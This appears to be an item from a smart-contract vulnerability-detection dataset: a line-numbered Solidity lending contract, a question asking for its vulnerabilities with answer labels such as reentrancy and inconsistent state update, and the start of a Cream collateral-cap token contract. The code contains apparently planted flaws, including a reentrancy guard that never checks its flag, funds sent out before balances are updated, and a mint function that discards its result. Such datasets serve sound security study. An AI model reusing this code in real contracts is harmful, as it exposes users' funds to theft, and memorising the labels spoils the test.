280     }

281     struct BorrowLocalVars {
282         MathError mathErr;
283         uint accountBorrows;
284         uint accountBorrowsNew;
285         uint totalBorrowsNew;
286     }

287     /**
288       * @notice Users borrow assets from the protocol to their own address
289       * @param borrowAmount The amount of the underlying asset to borrow
290       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
291       */
292     function borrowFresh(address payable borrower, uint borrowAmount) internal returns (uint) {
293         /* Fail if borrow not allowed */
294         uint allowed = comptroller.borrowAllowed(address(this), borrower, borrowAmount);
295         if (allowed != 0) {
296             return failOpaque(Error.COMPTROLLER_REJECTION, FailureInfo.BORROW_COMPTROLLER_REJECTION, allowed);
297         }

298         /*
299          * Return if borrowAmount is zero.
300          * Put behind `borrowAllowed` for accuring potential COMP rewards.
301          */
302         if (borrowAmount == 0) {
303             accountBorrows[borrower].interestIndex = borrowIndex;
304             return uint(Error.NO_ERROR);
305         }

306         /* Verify market's block number equals current block number */
307         if (accrualBlockNumber != getBlockNumber()) {
308             return fail(Error.MARKET_NOT_FRESH, FailureInfo.BORROW_FRESHNESS_CHECK);
309         }

310         /* Fail gracefully if protocol has insufficient underlying cash */
311         if (getCashPrior() < borrowAmount) {
312             return fail(Error.TOKEN_INSUFFICIENT_CASH, FailureInfo.BORROW_CASH_NOT_AVAILABLE);
313         }

314         BorrowLocalVars memory vars;

315         /*
316          * We calculate the new borrower and total borrow balances, failing on overflow:
317          *  accountBorrowsNew = accountBorrows + borrowAmount
318          *  totalBorrowsNew = totalBorrows + borrowAmount
319          */
320         vars.accountBorrows = borrowBalanceStoredInternal(borrower);
321         vars.accountBorrowsNew = add_(vars.accountBorrows, borrowAmount);
322         vars.totalBorrowsNew = add_(totalBorrows, borrowAmount);

323         /////////////////////////
324         // EFFECTS & INTERACTIONS
325         // (No safe failures beyond this point)

326         /*
327          * We invoke doTransferOut for the borrower and the borrowAmount.
328          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
329          *  On success, the cToken borrowAmount less of cash.
330          *  doTransferOut reverts if anything goes wrong, since we can't be sure if side effects occurred.
331          */
332         doTransferOut(borrower, borrowAmount);

333         /* We write the previously calculated values into storage */
334         accountBorrows[borrower].principal = vars.accountBorrowsNew;
335         accountBorrows[borrower].interestIndex = borrowIndex;
336         totalBorrows = vars.totalBorrowsNew;

337         /* We emit a Borrow event */
338         emit Borrow(borrower, borrowAmount, vars.accountBorrowsNew, vars.totalBorrowsNew);

339         /* We call the defense hook */
340         // unused function
341         // comptroller.borrowVerify(address(this), borrower, borrowAmount);

342         return uint(Error.NO_ERROR);
343     }

344     /**
345      * @notice Sender repays their own borrow
346      * @param repayAmount The amount to repay
347      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual repayment amount.
348      */
349     function repayBorrowInternal(uint repayAmount) internal nonReentrant returns (uint, uint) {
350         uint error = accrueInterest();
351         if (error != uint(Error.NO_ERROR)) {
352             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed
353             return (fail(Error(error), FailureInfo.REPAY_BORROW_ACCRUE_INTEREST_FAILED), 0);
354         }
355         // repayBorrowFresh emits repay-borrow-specific logs on errors, so we don't need to
356         return repayBorrowFresh(msg.sender, msg.sender, repayAmount);
357     }

358     /**
359      * @notice Sender repays a borrow belonging to borrower
360      * @param borrower the account with the debt being payed off
361      * @param repayAmount The amount to repay
362      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual repayment amount.
363      */
364     function repayBorrowBehalfInternal(address borrower, uint repayAmount) internal nonReentrant returns (uint, uint) {
365         uint error = accrueInterest();
366         if (error != uint(Error.NO_ERROR)) {
367             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed
368             return (fail(Error(error), FailureInfo.REPAY_BEHALF_ACCRUE_INTEREST_FAILED), 0);
369         }
370         // repayBorrowFresh emits repay-borrow-specific logs on errors, so we don't need to
371         return repayBorrowFresh(msg.sender, borrower, repayAmount);
372     }

373     struct RepayBorrowLocalVars {
374         Error err;
375         MathError mathErr;
376         uint repayAmount;
377         uint borrowerIndex;
378         uint accountBorrows;
379         uint accountBorrowsNew;
380         uint totalBorrowsNew;
381         uint actualRepayAmount;
382     }

383     /**
384      * @notice Borrows are repaid by another user (possibly the borrower).
385      * @param payer the account paying off the borrow
386      * @param borrower the account with the debt being payed off
387      * @param repayAmount the amount of undelrying tokens being returned
388      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual repayment amount.
389      */
390     function repayBorrowFresh(address payer, address borrower, uint repayAmount) internal returns (uint, uint) {
391         /* Fail if repayBorrow not allowed */
392         uint allowed = comptroller.repayBorrowAllowed(address(this), payer, borrower, repayAmount);
393         if (allowed != 0) {
394             return (failOpaque(Error.COMPTROLLER_REJECTION, FailureInfo.REPAY_BORROW_COMPTROLLER_REJECTION, allowed), 0);
395         }

396         /*
397          * Return if repayAmount is zero.
398          * Put behind `repayBorrowAllowed` for accuring potential COMP rewards.
399          */
400         if (repayAmount == 0) {
401             accountBorrows[borrower].interestIndex = borrowIndex;
402             return (uint(Error.NO_ERROR), 0);
403         }

404         /* Verify market's block number equals current block number */
405         if (accrualBlockNumber != getBlockNumber()) {
406             return (fail(Error.MARKET_NOT_FRESH, FailureInfo.REPAY_BORROW_FRESHNESS_CHECK), 0);
407         }

408         RepayBorrowLocalVars memory vars;

409         /* We remember the original borrowerIndex for verification purposes */
410         vars.borrowerIndex = accountBorrows[borrower].interestIndex;

411         /* We fetch the amount the borrower owes, with accumulated interest */
412         vars.accountBorrows = borrowBalanceStoredInternal(borrower);

413         /* If repayAmount == -1, repayAmount = accountBorrows */
414         if (repayAmount == uint(-1)) {
415             vars.repayAmount = vars.accountBorrows;
416         } else {
417             vars.repayAmount = repayAmount;
418         }

419         /////////////////////////
420         // EFFECTS & INTERACTIONS
421         // (No safe failures beyond this point)

422         /*
423          * We call doTransferIn for the payer and the repayAmount
424          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
425          *  On success, the cToken holds an additional repayAmount of cash.
426          *  doTransferIn reverts if anything goes wrong, since we can't be sure if side effects occurred.
427          *   it returns the amount actually transferred, in case of a fee.
428          */
429         vars.actualRepayAmount = doTransferIn(payer, vars.repayAmount);

430         /*
431          * We calculate the new borrower and total borrow balances, failing on underflow:
432          *  accountBorrowsNew = accountBorrows - actualRepayAmount
433          *  totalBorrowsNew = totalBorrows - actualRepayAmount
434          */
435         vars.accountBorrowsNew = sub_(vars.accountBorrows, vars.actualRepayAmount);
436         vars.totalBorrowsNew = sub_(totalBorrows, vars.actualRepayAmount);

437         /* We write the previously calculated values into storage */
438         accountBorrows[borrower].principal = vars.accountBorrowsNew;
439         accountBorrows[borrower].interestIndex = borrowIndex;
440         totalBorrows = vars.totalBorrowsNew;

441         /* We emit a RepayBorrow event */
442         emit RepayBorrow(payer, borrower, vars.actualRepayAmount, vars.accountBorrowsNew, vars.totalBorrowsNew);

443         /* We call the defense hook */
444         // unused function
445         // comptroller.repayBorrowVerify(address(this), payer, borrower, vars.actualRepayAmount, vars.borrowerIndex);

446         return (uint(Error.NO_ERROR), vars.actualRepayAmount);
447     }

448     /**
449      * @notice The sender liquidates the borrowers collateral.
450      *  The collateral seized is transferred to the liquidator.
451      * @param borrower The borrower of this cToken to be liquidated
452      * @param cTokenCollateral The market in which to seize collateral from the borrower
453      * @param repayAmount The amount of the underlying borrowed asset to repay
454      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual repayment amount.
455      */
456     function liquidateBorrowInternal(address borrower, uint repayAmount, CTokenInterface cTokenCollateral) internal nonReentrant returns (uint, uint) {
457         uint error = accrueInterest();
458         if (error != uint(Error.NO_ERROR)) {
459             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted liquidation failed
460             return (fail(Error(error), FailureInfo.LIQUIDATE_ACCRUE_BORROW_INTEREST_FAILED), 0);
461         }

462         error = cTokenCollateral.accrueInterest();
463         if (error != uint(Error.NO_ERROR)) {
464             // accrueInterest emits logs on errors, but we still want to log the fact that an attempted liquidation failed
465             return (fail(Error(error), FailureInfo.LIQUIDATE_ACCRUE_COLLATERAL_INTEREST_FAILED), 0);
466         }

467         // liquidateBorrowFresh emits borrow-specific logs on errors, so we don't need to
468         return liquidateBorrowFresh(msg.sender, borrower, repayAmount, cTokenCollateral);
469     }

470     /**
471      * @notice The liquidator liquidates the borrowers collateral.
472      *  The collateral seized is transferred to the liquidator.
473      * @param borrower The borrower of this cToken to be liquidated
474      * @param liquidator The address repaying the borrow and seizing collateral
475      * @param cTokenCollateral The market in which to seize collateral from the borrower
476      * @param repayAmount The amount of the underlying borrowed asset to repay
477      * @return (uint, uint) An error code (0=success, otherwise a failure, see ErrorReporter.sol), and the actual repayment amount.
478      */
479     function liquidateBorrowFresh(address liquidator, address borrower, uint repayAmount, CTokenInterface cTokenCollateral) internal returns (uint, uint) {
480         /* Fail if liquidate not allowed */
481         uint allowed = comptroller.liquidateBorrowAllowed(address(this), address(cTokenCollateral), liquidator, borrower, repayAmount);
482         if (allowed != 0) {
483             return (failOpaque(Error.COMPTROLLER_REJECTION, FailureInfo.LIQUIDATE_COMPTROLLER_REJECTION, allowed), 0);
484         }

485         /* Verify market's block number equals current block number */
486         if (accrualBlockNumber != getBlockNumber()) {
487             return (fail(Error.MARKET_NOT_FRESH, FailureInfo.LIQUIDATE_FRESHNESS_CHECK), 0);
488         }

489         /* Verify cTokenCollateral market's block number equals current block number */
490         if (cTokenCollateral.accrualBlockNumber() != getBlockNumber()) {
491             return (fail(Error.MARKET_NOT_FRESH, FailureInfo.LIQUIDATE_COLLATERAL_FRESHNESS_CHECK), 0);
492         }

493         /* Fail if borrower = liquidator */
494         if (borrower == liquidator) {
495             return (fail(Error.INVALID_ACCOUNT_PAIR, FailureInfo.LIQUIDATE_LIQUIDATOR_IS_BORROWER), 0);
496         }

497         /* Fail if repayAmount = 0 */
498         if (repayAmount == 0) {
499             return (fail(Error.INVALID_CLOSE_AMOUNT_REQUESTED, FailureInfo.LIQUIDATE_CLOSE_AMOUNT_IS_ZERO), 0);
500         }

501         /* Fail if repayAmount = -1 */
502         if (repayAmount == uint(-1)) {
503             return (fail(Error.INVALID_CLOSE_AMOUNT_REQUESTED, FailureInfo.LIQUIDATE_CLOSE_AMOUNT_IS_UINT_MAX), 0);
504         }


505         /* Fail if repayBorrow fails */
506         (uint repayBorrowError, uint actualRepayAmount) = repayBorrowFresh(liquidator, borrower, repayAmount);
507         if (repayBorrowError != uint(Error.NO_ERROR)) {
508             return (fail(Error(repayBorrowError), FailureInfo.LIQUIDATE_REPAY_BORROW_FRESH_FAILED), 0);
509         }

510         /////////////////////////
511         // EFFECTS & INTERACTIONS
512         // (No safe failures beyond this point)

513         /* We calculate the number of collateral tokens that will be seized */
514         (uint amountSeizeError, uint seizeTokens) = comptroller.liquidateCalculateSeizeTokens(address(this), address(cTokenCollateral), actualRepayAmount);
515         require(amountSeizeError == uint(Error.NO_ERROR), "LIQUIDATE_COMPTROLLER_CALCULATE_AMOUNT_SEIZE_FAILED");

516         /* Revert if borrower collateral token balance < seizeTokens */
517         require(cTokenCollateral.balanceOf(borrower) >= seizeTokens, "LIQUIDATE_SEIZE_TOO_MUCH");

518         // If this is also the collateral, run seizeInternal to avoid re-entrancy, otherwise make an external call
519         uint seizeError;
520         if (address(cTokenCollateral) == address(this)) {
521             seizeError = seizeInternal(address(this), liquidator, borrower, seizeTokens);
522         } else {
523             seizeError = cTokenCollateral.seize(liquidator, borrower, seizeTokens);
524         }

525         /* Revert if seize tokens fails (since we cannot be sure of side effects) */
526         require(seizeError == uint(Error.NO_ERROR), "token seizure failed");

527         /* We emit a LiquidateBorrow event */
528         emit LiquidateBorrow(liquidator, borrower, actualRepayAmount, address(cTokenCollateral), seizeTokens);

529         /* We call the defense hook */
530         // unused function
531         // comptroller.liquidateBorrowVerify(address(this), address(cTokenCollateral), liquidator, borrower, actualRepayAmount, seizeTokens);

532         return (uint(Error.NO_ERROR), actualRepayAmount);
533     }

534     /**
535      * @notice Transfers collateral tokens (this market) to the liquidator.
536      * @dev Will fail unless called by another cToken during the process of liquidation.
537      *  Its absolutely critical to use msg.sender as the borrowed cToken and not a parameter.
538      * @param liquidator The account receiving seized collateral
539      * @param borrower The account having collateral seized
540      * @param seizeTokens The number of cTokens to seize
541      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
542      */
543     function seize(address liquidator, address borrower, uint seizeTokens) external nonReentrant returns (uint) {
544         return seizeInternal(msg.sender, liquidator, borrower, seizeTokens);
545     }

546     /*** Admin Functions ***/

547     /**
548       * @notice Begins transfer of admin rights. The newPendingAdmin must call `_acceptAdmin` to finalize the transfer.
549       * @dev Admin function to begin change of admin. The newPendingAdmin must call `_acceptAdmin` to finalize the transfer.
550       * @param newPendingAdmin New pending admin.
551       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
552       */
553     function _setPendingAdmin(address payable newPendingAdmin) external returns (uint) {
554         // Check caller = admin
555         if (msg.sender != admin) {
556             return fail(Error.UNAUTHORIZED, FailureInfo.SET_PENDING_ADMIN_OWNER_CHECK);
557         }

558         // Save current value, if any, for inclusion in log
559         address oldPendingAdmin = pendingAdmin;

560         // Store pendingAdmin with value newPendingAdmin
561         pendingAdmin = newPendingAdmin;

562         // Emit NewPendingAdmin(oldPendingAdmin, newPendingAdmin)
563         emit NewPendingAdmin(oldPendingAdmin, newPendingAdmin);

564         return uint(Error.NO_ERROR);
565     }

566     /**
567       * @notice Accepts transfer of admin rights. msg.sender must be pendingAdmin
568       * @dev Admin function for pending admin to accept role and update admin
569       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
570       */
571     function _acceptAdmin() external returns (uint) {
572         // Check caller is pendingAdmin and pendingAdmin ≠ address(0)
573         if (msg.sender != pendingAdmin || msg.sender == address(0)) {
574             return fail(Error.UNAUTHORIZED, FailureInfo.ACCEPT_ADMIN_PENDING_ADMIN_CHECK);
575         }

576         // Save current values for inclusion in log
577         address oldAdmin = admin;
578         address oldPendingAdmin = pendingAdmin;

579         // Store admin with value pendingAdmin
580         admin = pendingAdmin;

581         // Clear the pending value
582         pendingAdmin = address(0);

583         emit NewAdmin(oldAdmin, admin);
584         emit NewPendingAdmin(oldPendingAdmin, pendingAdmin);

585         return uint(Error.NO_ERROR);
586     }

587     /**
588       * @notice Sets a new comptroller for the market
589       * @dev Admin function to set a new comptroller
590       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
591       */
592     function _setComptroller(ComptrollerInterface newComptroller) public returns (uint) {
593         // Check caller is admin
594         if (msg.sender != admin) {
595             return fail(Error.UNAUTHORIZED, FailureInfo.SET_COMPTROLLER_OWNER_CHECK);
596         }

597         ComptrollerInterface oldComptroller = comptroller;
598         // Ensure invoke comptroller.isComptroller() returns true
599         require(newComptroller.isComptroller(), "marker method returned false");

600         // Set market's comptroller to newComptroller
601         comptroller = newComptroller;

602         // Emit NewComptroller(oldComptroller, newComptroller)
603         emit NewComptroller(oldComptroller, newComptroller);

604         return uint(Error.NO_ERROR);
605     }

606     /**
607       * @notice accrues interest and sets a new reserve factor for the protocol using _setReserveFactorFresh
608       * @dev Admin function to accrue interest and set a new reserve factor
609       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
610       */
611     function _setReserveFactor(uint newReserveFactorMantissa) external nonReentrant returns (uint) {
612         uint error = accrueInterest();
613         if (error != uint(Error.NO_ERROR)) {
614             // accrueInterest emits logs on errors, but on top of that we want to log the fact that an attempted reserve factor change failed.
615             return fail(Error(error), FailureInfo.SET_RESERVE_FACTOR_ACCRUE_INTEREST_FAILED);
616         }
617         // _setReserveFactorFresh emits reserve-factor-specific logs on errors, so we don't need to.
618         return _setReserveFactorFresh(newReserveFactorMantissa);
619     }

620     /**
621       * @notice Sets a new reserve factor for the protocol (*requires fresh interest accrual)
622       * @dev Admin function to set a new reserve factor
623       * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
624       */
625     function _setReserveFactorFresh(uint newReserveFactorMantissa) internal returns (uint) {
626         // Check caller is admin
627         if (msg.sender != admin) {
628             return fail(Error.UNAUTHORIZED, FailureInfo.SET_RESERVE_FACTOR_ADMIN_CHECK);
629         }

630         // Verify market's block number equals current block number
631         if (accrualBlockNumber != getBlockNumber()) {
632             return fail(Error.MARKET_NOT_FRESH, FailureInfo.SET_RESERVE_FACTOR_FRESH_CHECK);
633         }

634         // Check newReserveFactor ≤ maxReserveFactor
635         if (newReserveFactorMantissa > reserveFactorMaxMantissa) {
636             return fail(Error.BAD_INPUT, FailureInfo.SET_RESERVE_FACTOR_BOUNDS_CHECK);
637         }

638         uint oldReserveFactorMantissa = reserveFactorMantissa;
639         reserveFactorMantissa = newReserveFactorMantissa;

640         emit NewReserveFactor(oldReserveFactorMantissa, newReserveFactorMantissa);

641         return uint(Error.NO_ERROR);
642     }

643     /**
644      * @notice Accrues interest and reduces reserves by transferring from msg.sender
645      * @param addAmount Amount of addition to reserves
646      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
647      */
648     function _addReservesInternal(uint addAmount) internal nonReentrant returns (uint) {
649         uint error = accrueInterest();
650         if (error != uint(Error.NO_ERROR)) {
651             // accrueInterest emits logs on errors, but on top of that we want to log the fact that an attempted reduce reserves failed.
652             return fail(Error(error), FailureInfo.ADD_RESERVES_ACCRUE_INTEREST_FAILED);
653         }

654         // _addReservesFresh emits reserve-addition-specific logs on errors, so we don't need to.
655         (error, ) = _addReservesFresh(addAmount);
656         return error;
657     }

658     /**
659      * @notice Add reserves by transferring from caller
660      * @dev Requires fresh interest accrual
661      * @param addAmount Amount of addition to reserves
662      * @return (uint, uint) An error code (0=success, otherwise a failure (see ErrorReporter.sol for details)) and the actual amount added, net token fees
663      */
664     function _addReservesFresh(uint addAmount) internal returns (uint, uint) {
665         // totalReserves + actualAddAmount
666         uint totalReservesNew;
667         uint actualAddAmount;

668         // We fail gracefully unless market's block number equals current block number
669         if (accrualBlockNumber != getBlockNumber()) {
670             return (fail(Error.MARKET_NOT_FRESH, FailureInfo.ADD_RESERVES_FRESH_CHECK), actualAddAmount);
671         }

672         /////////////////////////
673         // EFFECTS & INTERACTIONS
674         // (No safe failures beyond this point)

675         /*
676          * We call doTransferIn for the caller and the addAmount
677          *  Note: The cToken must handle variations between ERC-20 and ETH underlying.
678          *  On success, the cToken holds an additional addAmount of cash.
679          *  doTransferIn reverts if anything goes wrong, since we can't be sure if side effects occurred.
680          *  it returns the amount actually transferred, in case of a fee.
681          */

682         actualAddAmount = doTransferIn(msg.sender, addAmount);

683         totalReservesNew = add_(totalReserves, actualAddAmount);

684         // Store reserves[n+1] = reserves[n] + actualAddAmount
685         totalReserves = totalReservesNew;

686         /* Emit NewReserves(admin, actualAddAmount, reserves[n+1]) */
687         emit ReservesAdded(msg.sender, actualAddAmount, totalReservesNew);

688         /* Return (NO_ERROR, actualAddAmount) */
689         return (uint(Error.NO_ERROR), actualAddAmount);
690     }


691     /**
692      * @notice Accrues interest and reduces reserves by transferring to admin
693      * @param reduceAmount Amount of reduction to reserves
694      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
695      */
696     function _reduceReserves(uint reduceAmount) external nonReentrant returns (uint) {
697         uint error = accrueInterest();
698         if (error != uint(Error.NO_ERROR)) {
699             // accrueInterest emits logs on errors, but on top of that we want to log the fact that an attempted reduce reserves failed.
700             return fail(Error(error), FailureInfo.REDUCE_RESERVES_ACCRUE_INTEREST_FAILED);
701         }
702         // _reduceReservesFresh emits reserve-reduction-specific logs on errors, so we don't need to.
703         return _reduceReservesFresh(reduceAmount);
704     }

705     /**
706      * @notice Reduces reserves by transferring to admin
707      * @dev Requires fresh interest accrual
708      * @param reduceAmount Amount of reduction to reserves
709      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
710      */
711     function _reduceReservesFresh(uint reduceAmount) internal returns (uint) {
712         // totalReserves - reduceAmount
713         uint totalReservesNew;

714         // Check caller is admin
715         if (msg.sender != admin) {
716             return fail(Error.UNAUTHORIZED, FailureInfo.REDUCE_RESERVES_ADMIN_CHECK);
717         }

718         // We fail gracefully unless market's block number equals current block number
719         if (accrualBlockNumber != getBlockNumber()) {
720             return fail(Error.MARKET_NOT_FRESH, FailureInfo.REDUCE_RESERVES_FRESH_CHECK);
721         }

722         // Fail gracefully if protocol has insufficient underlying cash
723         if (getCashPrior() < reduceAmount) {
724             return fail(Error.TOKEN_INSUFFICIENT_CASH, FailureInfo.REDUCE_RESERVES_CASH_NOT_AVAILABLE);
725         }

726         // Check reduceAmount ≤ reserves[n] (totalReserves)
727         if (reduceAmount > totalReserves) {
728             return fail(Error.BAD_INPUT, FailureInfo.REDUCE_RESERVES_VALIDATION);
729         }

730         /////////////////////////
731         // EFFECTS & INTERACTIONS
732         // (No safe failures beyond this point)

733         totalReservesNew = sub_(totalReserves, reduceAmount);

734         // Store reserves[n+1] = reserves[n] - reduceAmount
735         totalReserves = totalReservesNew;

736         // doTransferOut reverts if anything goes wrong, since we can't be sure if side effects occurred.
737         doTransferOut(admin, reduceAmount);

738         emit ReservesReduced(admin, reduceAmount, totalReservesNew);

739         return uint(Error.NO_ERROR);
740     }

741     /**
742      * @notice accrues interest and updates the interest rate model using _setInterestRateModelFresh
743      * @dev Admin function to accrue interest and update the interest rate model
744      * @param newInterestRateModel the new interest rate model to use
745      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
746      */
747     function _setInterestRateModel(InterestRateModel newInterestRateModel) public returns (uint) {
748         uint error = accrueInterest();
749         if (error != uint(Error.NO_ERROR)) {
750             // accrueInterest emits logs on errors, but on top of that we want to log the fact that an attempted change of interest rate model failed
751             return fail(Error(error), FailureInfo.SET_INTEREST_RATE_MODEL_ACCRUE_INTEREST_FAILED);
752         }
753         // _setInterestRateModelFresh emits interest-rate-model-update-specific logs on errors, so we don't need to.
754         return _setInterestRateModelFresh(newInterestRateModel);
755     }

756     /**
757      * @notice updates the interest rate model (*requires fresh interest accrual)
758      * @dev Admin function to update the interest rate model
759      * @param newInterestRateModel the new interest rate model to use
760      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
761      */
762     function _setInterestRateModelFresh(InterestRateModel newInterestRateModel) internal returns (uint) {

763         // Used to store old model for use in the event that is emitted on success
764         InterestRateModel oldInterestRateModel;

765         // Check caller is admin
766         if (msg.sender != admin) {
767             return fail(Error.UNAUTHORIZED, FailureInfo.SET_INTEREST_RATE_MODEL_OWNER_CHECK);
768         }

769         // We fail gracefully unless market's block number equals current block number
770         if (accrualBlockNumber != getBlockNumber()) {
771             return fail(Error.MARKET_NOT_FRESH, FailureInfo.SET_INTEREST_RATE_MODEL_FRESH_CHECK);
772         }

773         // Track the market's current interest rate model
774         oldInterestRateModel = interestRateModel;

775         // Set the interest rate model to newInterestRateModel
776         interestRateModel = newInterestRateModel;

777         // Emit NewMarketInterestRateModel(oldInterestRateModel, newInterestRateModel)
778         emit NewMarketInterestRateModel(oldInterestRateModel, newInterestRateModel);

779         return uint(Error.NO_ERROR);
780     }

781     /*** Safe Token ***/

782     /**
783      * @notice Gets balance of this contract in terms of the underlying
784      * @dev This excludes the value of the current message, if any
785      * @return The quantity of underlying owned by this contract
786      */
787     function getCashPrior() internal view returns (uint);

788     /**
789      * @dev Performs a transfer in, reverting upon failure. Returns the amount actually transferred to the protocol, in case of a fee.
790      *  This may revert due to insufficient balance or insufficient allowance.
791      */
792     function doTransferIn(address from, uint amount) internal returns (uint);

793     /**
794      * @dev Performs a transfer out, ideally returning an explanatory error code upon failure tather than reverting.
795      *  If caller has not called checked protocol's balance, may revert due to insufficient cash held in the contract.
796      *  If caller has checked protocol's balance, and verified it is >= amount, this should not revert in normal conditions.
797      */
798     function doTransferOut(address payable to, uint amount) internal;

799     /**
800      * @notice Transfer `tokens` tokens from `src` to `dst` by `spender`
801      * @dev Called by both `transfer` and `transferFrom` internally
802      */
803     function transferTokens(address spender, address src, address dst, uint tokens) internal returns (uint);

804     /**
805      * @notice Get the account's cToken balances
806      */
807     function getCTokenBalanceInternal(address account) internal view returns (uint);

808     /**
809      * @notice User supplies assets into the market and receives cTokens in exchange
810      * @dev Assumes interest has already been accrued up to the current block
811      */
812     function mintFresh(address minter, uint mintAmount) internal returns (uint, uint);

813     /**
814      * @notice User redeems cTokens in exchange for the underlying asset
815      * @dev Assumes interest has already been accrued up to the current block
816      */
817     function redeemFresh(address payable redeemer, uint redeemTokensIn, uint redeemAmountIn) internal returns (uint);

818     /**
819      * @notice Transfers collateral tokens (this market) to the liquidator.
820      * @dev Called only during an in-kind liquidation, or by liquidateBorrow during the liquidation of another CToken.
821      *  Its absolutely critical to use msg.sender as the seizer cToken and not a parameter.
822      */
823     function seizeInternal(address seizerToken, address liquidator, address borrower, uint seizeTokens) internal returns (uint);

824     /*** Reentrancy Guard ***/

825     /**
826      * @dev Prevents a contract from calling itself, directly or indirectly.
827      */
828     modifier nonReentrant() {    
829         _notEntered = false;
830         _;
831         _notEntered = true; // get a gas-refund post-Istanbul
832     }
833 }
What are the vulnerabilities in the contract?
reentrancy
inconsistent state update 
ID uniqueness violation
arithmetic flaw
incorrect visibility/ownership 
<end of text>
1 pragma solidity ^0.5.16;

2 import "./CToken.sol";
3 import "./ERC3156FlashLenderInterface.sol";
4 import "./ERC3156FlashBorrowerInterface.sol";

5 /**
6  * @title Cream's CCollateralCapErc20 Contract
7  * @notice CTokens which wrap an EIP-20 underlying with collateral cap
8  * @author Cream
9  */
10 contract CCollateralCapErc20 is CToken, CCollateralCapErc20Interface {
11     /**
12      * @notice Initialize the new money market
13      * @param underlying_ The address of the underlying asset
14      * @param comptroller_ The address of the Comptroller
15      * @param interestRateModel_ The address of the interest rate model
16      * @param initialExchangeRateMantissa_ The initial exchange rate, scaled by 1e18
17      * @param name_ ERC-20 name of this token
18      * @param symbol_ ERC-20 symbol of this token
19      * @param decimals_ ERC-20 decimal precision of this token
20      */
21     function initialize(
22         address underlying_,
23         ComptrollerInterface comptroller_,
24         InterestRateModel interestRateModel_,
25         uint256 initialExchangeRateMantissa_,
26         string memory name_,
27         string memory symbol_,
28         uint8 decimals_
29     ) public {
30         // CToken initialize does the bulk of the work
31         super.initialize(comptroller_, interestRateModel_, initialExchangeRateMantissa_, name_, symbol_, decimals_);

32         // Set underlying and sanity check it
33         underlying = underlying_;
34         EIP20Interface(underlying).totalSupply();
35     }

36     /*** User Interface ***/

37     /**
38      * @notice Sender supplies assets into the market and receives cTokens in exchange
39      * @dev Accrues interest whether or not the operation succeeds, unless reverted
40      * @param mintAmount The amount of the underlying asset to supply
41      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
42      */
43     function mint(uint256 mintAmount) external returns (uint256) {
44         (uint256 err, ) = mintInternal(mintAmount, false);
    
45     }

46     /**
47      * @notice Sender redeems cTokens in exchange for the underlying asset
48      * @dev Accrues interest whether or not the operation succeeds, unless reverted
49      * @param redeemTokens The number of cTokens to redeem into underlying
50      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
51      */
52     function redeem(uint256 redeemTokens) external returns (uint256) {
53         require(redeemInternal(redeemTokens, false) == 0, "redeem failed");
54     }

55     /**
56      * @notice Sender redeems cTokens in exchange for a specified amount of underlying asset
57      * @dev Accrues interest whether or not the operation succeeds, unless reverted
58      * @param redeemAmount The amount of underlying to redeem
59      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
60      */
61     function redeemUnderlying(uint256 redeemAmount) external returns (uint256) {
62         require(redeemUnderlyingInternal(redeemAmount, false) == 0, "redeem underlying failed");
63     }

64     /**
65      * @notice Sender borrows assets from the protocol to their own address
66      * @param borrowAmount The amount of the underlying asset to borrow
67      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
68      */
69     function borrow(uint256 borrowAmount) external returns (uint256) {
70         require(borrowInternal(borrowAmount, false) == 0, "borrow failed");
71     }

72     /**
73      * @notice Sender repays their own borrow
74      * @param repayAmount The amount to repay
75      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
76      */
77     function repayBorrow(uint256 repayAmount) external returns (uint256) {
78         (uint256 err, ) = repayBorrowInternal(repayAmount, false);
79         require(err == 0, "repay failed");
80     }

81     /**
82      * @notice Sender repays a borrow belonging to borrower
83      * @param borrower the account with the debt being payed off
84      * @param repayAmount The amount to repay
85      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
86      */
87     function repayBorrowBehalf(address borrower, uint256 repayAmount) external returns (uint256) {
88         (uint256 err, ) = repayBorrowBehalfInternal(borrower, repayAmount, false);
89         require(err == 0, "repay behalf failed");
90     }

91     /**
92      * @notice The sender liquidates the borrowers collateral.
93      *  The collateral seized is transferred to the liquidator.
94      * @param borrower The borrower of this cToken to be liquidated
95      * @param repayAmount The amount of the underlying borrowed asset to repay
96      * @param cTokenCollateral The market in which to seize collateral from the borrower
97      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
98      */
99     function liquidateBorrow(
100         address borrower,
101         uint256 repayAmount,
102         CTokenInterface cTokenCollateral
103     ) external returns (uint256) {
104         (uint256 err, ) = liquidateBorrowInternal(borrower, repayAmount, cTokenCollateral, false);
105         require(err == 0, "liquidate borrow failed");
106     }

107     /**
108      * @notice The sender adds to reserves.
109      * @param addAmount The amount fo underlying token to add as reserves
110      * @return uint 0=success, otherwise a failure (see ErrorReporter.sol for details)
111      */
112     function _addReserves(uint256 addAmount) external returns (uint256) {
113         require(_addReservesInternal(addAmount, false) == 0, "add reserves failed");
114     }

115     /**
116      * @notice Set the given collateral cap for the market.
